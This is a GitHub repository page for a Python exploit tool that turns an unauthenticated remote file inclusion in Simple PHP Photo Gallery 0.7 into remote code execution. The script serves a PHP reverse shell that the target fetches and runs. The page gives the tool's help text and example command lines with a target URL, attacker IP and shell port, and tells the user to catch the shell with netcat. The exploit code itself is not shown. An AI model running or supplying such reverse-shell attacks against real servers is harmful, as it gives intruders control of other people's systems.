Skip to content

Simple PHP Photo Gallery 0.7 is vulnerable to Unauthenticated RFI. This script will attempt to turn that into RCE by automatically hosting a PHP reverse shell and then calling that shell back.

Notifications You must be signed in to change notification settings

beauknowstech/SimplePHPGal-RCE.py

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 

Repository files navigation

SimplePHPGal-RCE.py RFI --> RCE

Simple PHP Photo Gallery 0.7 is vulnerable to Unauthenticated RFI. This script will attempt to turn that into RCE by automatically hosting a PHP reverse shell and then calling that shell back. The attacker still needs to catch the shell with netcat or something similar.

Credit: https://www.exploit-db.com/exploits/48424

python3 SimplePHPGal-RCE.py -h

usage: SimplePHPGal-RCE.py [-h] [--httpport HTTPPORT] url attackerip attackerport

This script uses an RFI in SimplePHPGal to get RCE

python3 SimplePHPGal-RCE.py http://192.168.1.12/ 192.168.1.5 4444

python3 SimplePHPGal-RCE.py http://192.168.1.12/ 192.168.1.5 4444 --httpport 8080

positional arguments:

url The URL of the target.

attackerip Kali IP address for reverse shell and http server

attackerport Port for the reverse shell.

You may need to change the port to something other than 4444 maybe try ports that the machine has open.

optional arguments:

-h, --help show this help message and exit

--httpport HTTPPORT Port for the http server. Default 80

About

Simple PHP Photo Gallery 0.7 is vulnerable to Unauthenticated RFI. This script will attempt to turn that into RCE by automatically hosting a PHP reverse shell and then calling that shell back.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages